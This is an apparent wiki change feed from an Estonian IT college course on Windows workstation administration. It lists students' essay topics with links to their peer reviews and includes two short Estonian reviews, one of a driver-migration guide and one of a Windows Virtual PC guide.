=Sander Saveli=&lt;br /&gt;
* Referaat: [[Skydrive]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Draiverite_haldus_Windows_7_operatsioonis%C3%BCsteemis&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:DirectAccess&lt;br /&gt;
&lt;br /&gt;
=Oliver Naaris=&lt;br /&gt;
* Referaat: [[Offline files]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Snipping_Tool&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Sysprep&lt;br /&gt;
&lt;br /&gt;
=Sander Arnus=&lt;br /&gt;
* Referaat: [[Sysprep]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Skydrive&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Windows_System_Image_Manager&lt;br /&gt;
&lt;br /&gt;
=Sander Pikhoff=&lt;br /&gt;
* Referaat: [[GPT]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Reliability_Monitor&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:DirectAccess&lt;br /&gt;
&lt;br /&gt;
=Henry Ilves=&lt;br /&gt;
* Referaat: [[Windows juhend: Kuidas ühele USB mäluseadmele korraga x86 ja x64 Windows 7 paigaldamiseks vajalik]]&lt;br /&gt;
* Arvustus1: &lt;br /&gt;
* Arvustus2: &lt;br /&gt;
&lt;br /&gt;
=Teet Saar=&lt;br /&gt;
* Referaat: [[WAIK]]&lt;br /&gt;
* Arvustus1:&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Urmo Lihten=&lt;br /&gt;
* Referaat: [[Windows juhend: Kuidas paigaldada uuendusi kujutisfaili DISM tööriista abil]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:System_Configuration_Tool&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Rauno Lehiste=&lt;br /&gt;
* Referaat: [[MDT]]&lt;br /&gt;
* Arvustus1:&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Kristo Kapten=&lt;br /&gt;
* Referaat: [[VHD Boot]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Windows_juhend:_Kuidas_%C3%BChele_USB_m%C3%A4luseadmele_korraga_x86_ja_x64_Windows_7_paigaldamiseks_vajalik&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Windows_Defender&lt;br /&gt;
&lt;br /&gt;
= Kullo-Kalev Aru =&lt;br /&gt;
* Referaat: [[TeamViewer]]&lt;br /&gt;
* Arvustus1:&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Kalmer Tart=&lt;br /&gt;
* Referaat: [[Reliability Monitor]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Boot_Configuration_Data&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Windows_User_State_Migration_Tool_%28USMT%29&lt;br /&gt;
&lt;br /&gt;
=Priit Lilleleht=&lt;br /&gt;
* Referaat: [[Application Compatibility Toolkit]]&lt;br /&gt;
* Arvustus1:https://wiki.itcollege.ee/index.php/Talk:Math_Input_Panel&lt;br /&gt;
* Arvustus2:https://wiki.itcollege.ee/index.php/Talk:Disk_Defragmenter&lt;br /&gt;
&lt;br /&gt;
=Sander Sülla=&lt;br /&gt;
* Referaat: [[Windows System Image Manager]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:MDT&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Snipping_Tool&lt;br /&gt;
&lt;br /&gt;
=Kertu Tampõld=&lt;br /&gt;
* Referaat: [[Resource Monitor]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Remote_Assistance&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Application_Compatibility_Toolkit&lt;br /&gt;
&lt;br /&gt;
=Nele Kiigemägi=&lt;br /&gt;
*Referaat: [[Remote Assistance]]&lt;br /&gt;
*Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Resource_Monitor&lt;br /&gt;
*Arvustus2: https://wiki.itcollege.ee/index.php/Talk:CHKDSK&lt;br /&gt;
&lt;br /&gt;
=Kermo Pajula=&lt;br /&gt;
*Referaat: [[DirectAccess]]&lt;br /&gt;
*Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Windows_8_NIC_Teaming&lt;br /&gt;
*Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Robert Vane=&lt;br /&gt;
*Referaat: [[CHKDSK]]&lt;br /&gt;
*Arvustus1:&lt;br /&gt;
*Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Alar Hansar=&lt;br /&gt;
* Referaat: [[GPO]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Draiverite_haldus_Windows_7_operatsioonis%C3%BCsteemis&lt;br /&gt;
* Arvustus2: &lt;br /&gt;
&lt;br /&gt;
=Kaarel Väinaste=&lt;br /&gt;
* Referaat: [[Snipping Tool]]&lt;br /&gt;
* Arvustus1: &lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Ragnar Plint=&lt;br /&gt;
* Referaat: [[Program Compatibility Troubleshooter]]&lt;br /&gt;
* Arvustus1: [[Talk:AppLocker]]&lt;br /&gt;
* Arvustus2: [[Talk:DirectAccess]]&lt;br /&gt;
&lt;br /&gt;
=Taavi Sannik=&lt;br /&gt;
* Referaat: [[DISKPART]]&lt;br /&gt;
* Arvustus 1: [[Talk:Windows_8_NIC_Teaming#Taavi_Sannik|Windows 8 NIC teaming]]&lt;br /&gt;
* Arvustus 2: [[Talk:CHKDSK#Taavi_Sannik|CHKDSK]]&lt;br /&gt;
&lt;br /&gt;
=Priit Reidak=&lt;br /&gt;
* Referaat: [[Disk2vhd]]&lt;br /&gt;
* Arvustus1: [https://wiki.itcollege.ee/index.php/Talk:Windows_Defender Windows Defender]&lt;br /&gt;
* Arvustus2: [https://wiki.itcollege.ee/index.php/Talk:Boot_Configuration_Data BCD]&lt;br /&gt;
&lt;br /&gt;
= Raigo Trei =&lt;br /&gt;
* Referaat: [[Windows 7 Upgrade Advisor]]&lt;br /&gt;
* Arvustus1:&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
= Robert Pärn =&lt;br /&gt;
* Referaat: [[Special identity]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Dynamic_disk&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:DISKPART&lt;br /&gt;
&lt;br /&gt;
= Kristjan Karu =&lt;br /&gt;
* Referaat: [[Draiverite haldus Windows 7 operatsioonisüsteemis]]&lt;br /&gt;
* Arvustus1:&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Iti Liivik=&lt;br /&gt;
* Referaat: [[Effective permissions]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Draiverite_haldus_Windows_7_operatsioonis%C3%BCsteemis&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Windows_7_Homegroup_and_sharing&lt;br /&gt;
&lt;br /&gt;
=Dmitri Keler=&lt;br /&gt;
* Referaat: [[System restore point]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Windows_8_-_mida_uut&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:DISKPART&lt;br /&gt;
&lt;br /&gt;
=Jevgeni Pogodin=&lt;br /&gt;
* Referaat: [[FAT32]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:WAIK&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Andres Pihlak=&lt;br /&gt;
* Referaat: [[Windows Virtual PC]]&lt;br /&gt;
* Arvustus1: &lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Deniss Ruzanov=&lt;br /&gt;
* Referaat: [[IPv6 võrguparameetrite seadistamine]]&lt;br /&gt;
* Arvustus1: &lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Martin Aarne=&lt;br /&gt;
* Referaat: [[Windows User State Migration Tool (USMT)]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:AppLocker#Martin_Aarne_D22&lt;br /&gt;
* Arvustus 2: https://wiki.itcollege.ee/index.php/Talk:WAIK#Martin_Aarne_D22&lt;br /&gt;
&lt;br /&gt;
=Matis Alliksoo=&lt;br /&gt;
* Referaat: [[Windows 8 NIC Teaming]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:Windows_Virtual_PC&lt;br /&gt;
* Arvustus 2: https://wiki.itcollege.ee/index.php/Talk:Windows_juhend:_Kuidas_t%C3%B5sta_seadmete_draivereid_%C3%BChes_arvutist_teise&lt;br /&gt;
&lt;br /&gt;
= Richard Teppart =&lt;br /&gt;
* Referaat: [[Volume shadow copies]]&lt;br /&gt;
* Arvestus 1: &lt;br /&gt;
* Arvestus 2:&lt;br /&gt;
&lt;br /&gt;
= Igor Pavlov =&lt;br /&gt;
* Referaat: [[Windows Defender]]&lt;br /&gt;
* Arvustus 1: &lt;br /&gt;
* Arvustus 2: &lt;br /&gt;
&lt;br /&gt;
= Taavi Podzuks =&lt;br /&gt;
* Referaat: [[Windows juhend: Kuidas paigaldata täiendavaid (juur)sertfikaate]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php?title=Talk:Windows_Virtual_PC&amp;amp;action=edit&amp;amp;section=2&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:BitLocker_To_Go&lt;br /&gt;
&lt;br /&gt;
=Kersti Lang=&lt;br /&gt;
* Referaat: [[Windows 7]]&lt;br /&gt;
* Arvestus 1:&lt;br /&gt;
* Arvestus 2:&lt;br /&gt;
&lt;br /&gt;
= Gert Häusler =&lt;br /&gt;
* Referaat: [[Windows Biometric Framework]]&lt;br /&gt;
* Arvestus 1: &lt;br /&gt;
* Arvestus 2:&lt;br /&gt;
&lt;br /&gt;
= Erki Miilberg =&lt;br /&gt;
* Referaat: [[Windows operatsioonisüsteemi paigaldus]]&lt;br /&gt;
* Arvustus 1: &lt;br /&gt;
* Arvustus 2:&lt;br /&gt;
&lt;br /&gt;
= Rasmus Tetsmann=&lt;br /&gt;
* Referaat: [[Windows 7 Homegroup and sharing]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:Windows_8_-_mida_uut&lt;br /&gt;
* Arvustus 2: https://wiki.itcollege.ee/index.php/Talk:Windows_juhend:_Kuidas_%C3%BChele_USB_m%C3%A4luseadmele_korraga_x86_ja_x64_Windows_7_paigaldamiseks_vajalik&lt;br /&gt;
&lt;br /&gt;
= Lauri Rüütli =&lt;br /&gt;
* Referaat: [[Windows juhend: Kuidas paigaldada täiendavaid draivereid]]&lt;br /&gt;
* Arvestus 1: https://wiki.itcollege.ee/index.php/Talk:DISKPART&lt;br /&gt;
* Arvestus 2: https://wiki.itcollege.ee/index.php/Talk:WAIK&lt;br /&gt;
&lt;br /&gt;
= Taavi Zeiger =&lt;br /&gt;
* Referaat: [[Disk Defragmenter]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:CHKDSK&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Offline_files&lt;br /&gt;
&lt;br /&gt;
= Kimmo Lillipuu =&lt;br /&gt;
* Referaat: [[Windows Remote Management]]&lt;br /&gt;
* Arvestus 1: https://wiki.itcollege.ee/index.php/Talk:Windows_7&lt;br /&gt;
* Arvestus 2: https://wiki.itcollege.ee/index.php/Talk:Windows_operatsioonisüsteemi_paigaldus&lt;br /&gt;
&lt;br /&gt;
= Heigo Punapart =&lt;br /&gt;
* Referaat: [[Incremental backup]]&lt;br /&gt;
* Arvestus 1: https://wiki.itcollege.ee/index.php/Talk:Sysprep&lt;br /&gt;
* Arvestus 2: https://wiki.itcollege.ee/index.php/Talk:Windows_PE&lt;br /&gt;
&lt;br /&gt;
= Velmar Piibeleht =&lt;br /&gt;
* Referaat: [[BitLocker To Go]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:Skydrive#Velmar_Piibeleht&lt;br /&gt;
* Arvustus 2: https://wiki.itcollege.ee/index.php/Talk:Windows_juhend:_Kuidas_t%C3%B5sta_seadmete_draivereid_%C3%BChes_arvutist_teise&lt;br /&gt;
&lt;br /&gt;
= Alo Konno =&lt;br /&gt;
* Referaat: [[Windows 8 - mida uut]]&lt;br /&gt;
* Arvustus 1: &lt;br /&gt;
* Arvustus 2:&lt;br /&gt;
&lt;br /&gt;
= Andre- Marcel Peri =&lt;br /&gt;
* Referaat: [[AppLocker]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:Windows_7&lt;br /&gt;
* Arvustus 2:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*[[ Windows PE]]-Marek Lepla&lt;br /&gt;
*[[ Workgroup]] - Ragnar Kullamäe&lt;br /&gt;
&lt;br /&gt;
= Gertti-Vena Rätsep =&lt;br /&gt;
* Referaat: [[VPN &amp;amp; SVPN]]&lt;br /&gt;
* Arvestus 1: &lt;br /&gt;
* Arvestus 2:&lt;br /&gt;
&lt;br /&gt;
= Kalju Hõbemäe =&lt;br /&gt;
* Referaat: [[Math Input Panel]]&lt;br /&gt;
* Arvestus 1: https://wiki.itcollege.ee/index.php/Talk:Math_Input_Panel&lt;br /&gt;
* Arvestus 2:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Karl Krasilnikov =&lt;br /&gt;
* Referaat: [[PnPUtil]]&lt;br /&gt;
* Arvestus 1: &lt;br /&gt;
* Arvestus 2:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Sander Saarm =&lt;br /&gt;
&lt;br /&gt;
* Referaat: [[Toiteseadete seadistamine Windows 7 operatsioonisüsteemis]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:Windows_juhend:_Kuidas_ekraanipilti_hallata_(keeramised,_p%C3%B6%C3%B6ramised,_lahutusv%C3%B5ime_ja_lisaekraanid)&lt;br /&gt;
* Arvustus 2: https://wiki.itcollege.ee/index.php/Talk:Disk_Defragmenter&lt;br /&gt;
&lt;br /&gt;
= Carolys Kallas =&lt;br /&gt;
&lt;br /&gt;
* Referaat: [[Powercfg.exe]]&lt;br /&gt;
* Arvustus 1: &lt;br /&gt;
* Arvustus 2:&lt;br /&gt;
&lt;br /&gt;
= Kairo Koik =&lt;br /&gt;
* Referaat: [[Windows juhend: Kuidas ekraanipilti hallata (keeramised, pööramised, lahutusvõime ja lisaekraanid)]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php/Talk:GPT&lt;br /&gt;
* Arvustus 2: https://wiki.itcollege.ee/index.php/Talk:Sysprep&lt;br /&gt;
&lt;br /&gt;
= Marek Lepla =&lt;br /&gt;
* Referaat: [[Windows PE]]&lt;br /&gt;
* Arvustus 1: https://wiki.itcollege.ee/index.php?title=Talk:Windows_juhend:_Kuidas_paigaldada_uuendusi_kujutisfaili_DISM_t%C3%B6%C3%B6riista_abil&amp;amp;action=edit&amp;amp;redlink=1 &lt;br /&gt;
* Arvustus 2: https://wiki.itcollege.ee/index.php?title=Talk:Incremental_backup&amp;amp;action=edit&amp;amp;redlink=1&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Windows_juhend:_Kuidas_t%C3%B5sta_seadmete_draivereid_%C3%BChes_arvutist_teise&amp;diff=38680</id>
		<title>Talk:Windows juhend: Kuidas tõsta seadmete draivereid ühes arvutist teise</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Windows_juhend:_Kuidas_t%C3%B5sta_seadmete_draivereid_%C3%BChes_arvutist_teise&amp;diff=38680"/>
		<updated>2011-10-17T15:40:16Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Velmar Piibeleht ==&lt;br /&gt;
&#039;&#039;&#039;Sisu:&#039;&#039;&#039; On ära märgitud kõik hetkel rohkem kasutuses olevad Windowsi-d kuid oleks võinud rohkem välja tuua Windows XP driverite varundamisest kuna enamasti kasutatakse Win Xp-d vanematel raalidel kus ka vanem riistvara, mille drivereid netist aga nii kergelt leida ei pruugi ja vajadus driverite varundamisele on suurem. Windows Vista ja 7 on juba suhteliselt võimekad ise vajalikke drivereid leidma kuna windows update töötab üpriski adekvaadselt, enamasti vanema riistvaraga probleeme. Filerepository on küll hea võimalus kõiki drivereid korraga varundada kuid samas tänapäeval on pea kõikjal internet ning sellest tulenevalt ka uued driverid kättesaadavad ning alati on mõteks ju kasutada uusimaid töötavaid drivereid. Selle kasulikkus tuleb välja varem mainitud vanema või ka erilise riistvara kasutamisel. &amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Kujundus:&#039;&#039;&#039; Esimene pilt kus toodud viide Device Managerile. Milleks minna ringiga kui saab otse? Windowsi märk ja kirjutada sisse Device Manager, sedagi ei pea lõpuni kirjutama. Aga see oli lihtsalt valge inimese tähelepanek kuidas asju lihtsamini teha. Üldiselt on jällegi selgeks tehtud ka võhikule, mis ongi ühe juhendi mõte.&lt;br /&gt;
&lt;br /&gt;
Kokkuvõtvalt on kasulik kõigile kes ei leia oma riistvarale õigeid drivereid kuna on toodud ka välja võimalus kuidas otsida oma puuduva riistvara drivereid mida Windows Update ei leia ja mille tarkvara enam alles ei ole.&lt;br /&gt;
&lt;br /&gt;
==Matis Alliksoo==&lt;br /&gt;
&#039;&#039;&#039;Sisu:&#039;&#039;&#039;&lt;br /&gt;
Sisu on hästi jälgitav ja korralik. Sisu on üles ehitatud selliselt, et ka arvutit vähem tundvad inimesed antud juhisega hakkama saaksid. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kujundus:&#039;&#039;&#039;&lt;br /&gt;
Kujundus näeb hea välja. Pildid on normaalse suurusega ja erinevad path&#039;id ja command&#039;id on eraldi kastides hästi välja toodud.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Juhendi kavaliteet:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Viitamine:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Eriti meeldis:&#039;&#039;&#039;&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Windows_Virtual_PC&amp;diff=38666</id>
		<title>Talk:Windows Virtual PC</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Windows_Virtual_PC&amp;diff=38666"/>
		<updated>2011-10-17T14:59:49Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Matis Alliksoo=&lt;br /&gt;
&#039;&#039;&#039;Sisu:&#039;&#039;&#039;&lt;br /&gt;
Antud artiklist saab teada enamus vajalikud baasteadmised Virtual PC kohta - Riistvaralised nõuded, piirangud ja võimalused. Sisu järgi on väga edukalt võimalik üles seadistada üks virtuaalne Windows 7 arvuti. Lisaks oleks võinud võib-olla ainult Networkingu seadetest rääkida.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kujundus:&#039;&#039;&#039;&lt;br /&gt;
Kujundus on ilus ja kõik näeb &amp;quot;puhas&amp;quot; välja. Pildid on lisatud piisava suurusega, et ka juhendi järgi tegutsedes poleks arvatavasti tarvis pilte eraldi lahti võtta ehk suurendada.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Juhendi kavaliteet:&#039;&#039;&#039;&lt;br /&gt;
Juhend on kvaliteetne ja seda on hea jälgida. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Viitamine:&#039;&#039;&#039;&lt;br /&gt;
Kõik viited peale ühe on Microsofti enda lehelt, mis on väga hea. Seda kindlam, et andmed mida artiklis kasutatud on õiged.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Eriti meeldis:&#039;&#039;&#039;&lt;br /&gt;
Integration componentsi lisamise ja paigaldamise osa. Hea ja vajalik lisa, mis lihtsustab paljutki.&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Windows-t%C3%B6%C3%B6jaamade_haldamise_aines_valminud_referaadid_2011_s%C3%BCgis,_p%C3%A4eva%C3%B5pe&amp;diff=38657</id>
		<title>Windows-tööjaamade haldamise aines valminud referaadid 2011 sügis, päevaõpe</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Windows-t%C3%B6%C3%B6jaamade_haldamise_aines_valminud_referaadid_2011_s%C3%BCgis,_p%C3%A4eva%C3%B5pe&amp;diff=38657"/>
		<updated>2011-10-17T14:31:54Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Matis Alliksoo */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Jaan Igamees=&lt;br /&gt;
* Referaat: [[MiskiAsjalikTeema]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:VHD_Boot&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
=Silver Kullarand=&lt;br /&gt;
* Referaat: [[SmartScreen Filter]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Dynamic_disk&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Windows_8_-_mida_uut&lt;br /&gt;
&lt;br /&gt;
=Tambet Liiv=&lt;br /&gt;
* Referaat: [[Boot Configuration Data]]&lt;br /&gt;
* Arvustus1:&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
= Kristjan Rõõm =&lt;br /&gt;
* Referaat: [[Security zones]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:VHD_Boot&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:SmartScreen_Filter&lt;br /&gt;
&lt;br /&gt;
= Viljar Rooda =&lt;br /&gt;
* Referaat: [[Dynamic disk]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Security_zones&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:SmartScreen_Filter&lt;br /&gt;
&lt;br /&gt;
= Virgo Krüger =&lt;br /&gt;
*Referaat: [[Windows juhend: Kuidas tõsta seadmete draivereid ühes arvutist teise]]&lt;br /&gt;
*Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Resource_Monitor&lt;br /&gt;
*Arvutus2: https://wiki.itcollege.ee/index.php/Talk:PnPUtil&lt;br /&gt;
&lt;br /&gt;
=Tarmo Suurmägi=&lt;br /&gt;
* Referaat: [[System Configuration Tool]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Windows_7_Upgrade_Advisor&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:System_restore_point&lt;br /&gt;
&lt;br /&gt;
=Sander Saveli=&lt;br /&gt;
* Referaat: [[Skydrive]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Draiverite_haldus_Windows_7_operatsioonis%C3%BCsteemis&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:DirectAccess&lt;br /&gt;
&lt;br /&gt;
=Oliver Naaris=&lt;br /&gt;
* Referaat: [[Offline files]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Snipping_Tool&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Sysprep&lt;br /&gt;
&lt;br /&gt;
=Sander Arnus=&lt;br /&gt;
* Referaat: [[Sysprep]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Skydrive&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Windows_System_Image_Manager&lt;br /&gt;
&lt;br /&gt;
=Sander Pikhoff=&lt;br /&gt;
* Referaat: [[GPT]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Reliability_Monitor&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:DirectAccess&lt;br /&gt;
&lt;br /&gt;
=Henry Ilves=&lt;br /&gt;
* Referaat: [[Windows juhend: Kuidas ühele USB mäluseadmele korraga x86 ja x64 Windows 7 paigaldamiseks vajalik]]&lt;br /&gt;
* Arvustus1: &lt;br /&gt;
* Arvustus2: &lt;br /&gt;
&lt;br /&gt;
=Teet Saar=&lt;br /&gt;
* Referaat: [[WAIK]]&lt;br /&gt;
* Arvustus1:&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Urmo Lihten=&lt;br /&gt;
* Referaat: [[Windows juhend: Kuidas paigaldada uuendusi kujutisfaili DISM tööriista abil]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:System_Configuration_Tool&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Rauno Lehiste=&lt;br /&gt;
* Referaat: [[MDT]]&lt;br /&gt;
* Arvustus1:&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Kristo Kapten=&lt;br /&gt;
* Referaat: [[VHD Boot]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Windows_juhend:_Kuidas_%C3%BChele_USB_m%C3%A4luseadmele_korraga_x86_ja_x64_Windows_7_paigaldamiseks_vajalik&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Windows_Defender&lt;br /&gt;
&lt;br /&gt;
= Kullo-Kalev Aru =&lt;br /&gt;
* Referaat: [[TeamViewer]]&lt;br /&gt;
* Arvustus1:&lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Kalmer Tart=&lt;br /&gt;
* Referaat: [[Reliability Monitor]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Boot_Configuration_Data&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Windows_User_State_Migration_Tool_%28USMT%29&lt;br /&gt;
&lt;br /&gt;
=Priit Lilleleht=&lt;br /&gt;
* Referaat: [[Application Compatibility Toolkit]]&lt;br /&gt;
* Arvustus1:https://wiki.itcollege.ee/index.php/Talk:Math_Input_Panel&lt;br /&gt;
* Arvustus2:https://wiki.itcollege.ee/index.php/Talk:Disk_Defragmenter&lt;br /&gt;
&lt;br /&gt;
=Sander Sülla=&lt;br /&gt;
* Referaat: [[Windows System Image Manager]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:MDT&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Snipping_Tool&lt;br /&gt;
&lt;br /&gt;
=Kertu Tampõld=&lt;br /&gt;
* Referaat: [[Resource Monitor]]&lt;br /&gt;
* Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Remote_Assistance&lt;br /&gt;
* Arvustus2: https://wiki.itcollege.ee/index.php/Talk:Application_Compatibility_Toolkit&lt;br /&gt;
&lt;br /&gt;
=Nele Kiigemägi=&lt;br /&gt;
*Referaat: [[Remote Assistance]]&lt;br /&gt;
*Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Resource_Monitor&lt;br /&gt;
*Arvustus2: https://wiki.itcollege.ee/index.php/Talk:CHKDSK&lt;br /&gt;
&lt;br /&gt;
=Kermo Pajula=&lt;br /&gt;
*Referaat: [[DirectAccess]]&lt;br /&gt;
*Arvustus1: https://wiki.itcollege.ee/index.php/Talk:Windows_8_NIC_Teaming&lt;br /&gt;
*Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Robert Vane=&lt;br /&gt;
*Referaat: [[CHKDSK]]&lt;br /&gt;
*Arvustus1:&lt;br /&gt;
*Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Alar Hansar=&lt;br /&gt;
* Referaat: [[GPO]]&lt;br /&gt;
* Arvustus1: &lt;br /&gt;
* Arvustus2: &lt;br /&gt;
&lt;br /&gt;
=Kaarel Väinaste=&lt;br /&gt;
* Referaat: [[Snipping Tool]]&lt;br /&gt;
* Arvustus1: &lt;br /&gt;
* Arvustus2:&lt;br /&gt;
&lt;br /&gt;
=Ragnar Plint=&lt;br /&gt;
* Referaat: [[Program Compatibility Troubleshooter]]&lt;br /&gt;
* Arvustus1: [[Talk:AppLocker]]&lt;br /&gt;
* Arvustus2: [[Talk:DirectAccess]]&lt;br /&gt;
&lt;br /&gt;
=Taavi Sannik=&lt;br /&gt;
* Referaat: [[DISKPART]]&lt;br /&gt;
* Arvustus1: [[Talk:Windows_8_NIC_Teaming#Taavi_Sannik|Windows 8 NIC teaming]]&lt;br /&gt;
* Arvustus2: &lt;br /&gt;
&lt;br /&gt;
=Priit Reidak=&lt;br /&gt;
